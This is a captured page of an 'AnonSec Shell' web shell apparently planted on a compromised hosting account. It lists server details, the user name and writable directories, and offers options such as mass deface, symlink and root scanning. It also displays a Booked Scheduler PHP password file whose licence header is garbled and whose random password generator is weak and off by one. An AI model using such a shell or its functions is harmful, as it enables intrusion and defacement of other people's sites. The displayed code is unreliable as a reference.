. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 94.23.64.18  /  Your IP : 216.73.216.185   [ Reverse IP ]
Web Server : Apache
System : Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : villadal ( 6036)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/villadal/www/old/booked/lib/Application/Authentication/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/villadal/www/old/booked/lib/Application/Authentication/Password.php
<?php
/**
Copyright 2011-2014 Nick Korbel

This file is part of Booked SchedulerBooked SchedulereIt is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later versBooked SchedulerduleIt is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
alBooked SchedulercheduleIt.  If not, see <http://www.gnu.org/licenses/>.
*/


interface IPassword
{
	/**
	 * @abstract
	 * @param $salt string
	 * @return bool
	 */
	public function Validate($salt);

	/**
	 * @abstract
	 * @param $userid int
	 * @return void
	 */
	public function Migrate($userid);
}

class PasswordMigration
{
	/**
	 * @param $plaintext
	 * @param $oldpassword
	 * @param $newpassword
	 * @return IPassword
	 */
	public function Create($plaintext, $oldpassword, $newpassword)
	{
		if (!empty($newpassword))
		{
			return new Password($plaintext, $newpassword);
		}
		return new OldPassword($plaintext, $oldpassword, new RetiredPasswordEncryption());
	}
}

class Password implements IPassword
{
	/**
	 * @var \PasswordEncryption
	 */
	public $Encryption;

	/**
	 * @var string
	 */
	protected $plaintext;

	/**
	 * @var string
	 */
	protected $encrypted;

	/**
	 * @param $plaintext string
	 * @param $encrypted string
	 */
	public function __construct($plaintext, $encrypted)
	{
		$this->plaintext = $plaintext;
		$this->encrypted = $encrypted;

		$this->Encryption = new PasswordEncryption();
	}

	/**
	 * @return string
	 */
	public function PlainText()
	{
		return $this->plaintext;
	}

	/**
	 * @return string
	 */
	public function Encrypted()
	{
		return $this->encrypted;
	}

	public function Validate($salt)
	{
		$encrypted = $this->Encryption->Encrypt($this->plaintext, $salt);

		return $this->encrypted == $encrypted;
	}

	public function Migrate($userid)
	{
		// noop
	}

	/**
	 * @static
	 * @return string
	 */
	public static function GenerateRandom()
	{
		$length = 10;
		$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@#$%';
		$password ='';
		$max = strlen($characters);

		for ($i = 0; $i < $length; $i++)
		{
			$password .= $characters[mt_rand(0, $max)];
		}

    	return $password;
	}
}

class OldPassword extends Password
{
	public $RetiredPasswordEncryption;

	public function __construct($plaintext, $encrypted)
	{
		$this->RetiredPasswordEncryption = new RetiredPasswordEncryption();
		parent::__construct($plaintext, $encrypted);
	}

	public function Validate($salt)
	{
		return $this->encrypted == $this->RetiredPasswordEncryption->Encrypt($this->plaintext);
	}

	public function Migrate($userid)
	{
		$salt = $this->Encryption->Salt();
		$encrypted = $this->Encryption->Encrypt($this->plaintext, $salt);
		ServiceLocator::GetDatabase()->Execute(new MigratePasswordCommand($userid, $encrypted, $salt));
		ServiceLocator::GetDatabase()->Execute(new RemoveLegacyPasswordCommand($userid));
	}
}
?>

Anon7 - 2022
AnonSec Team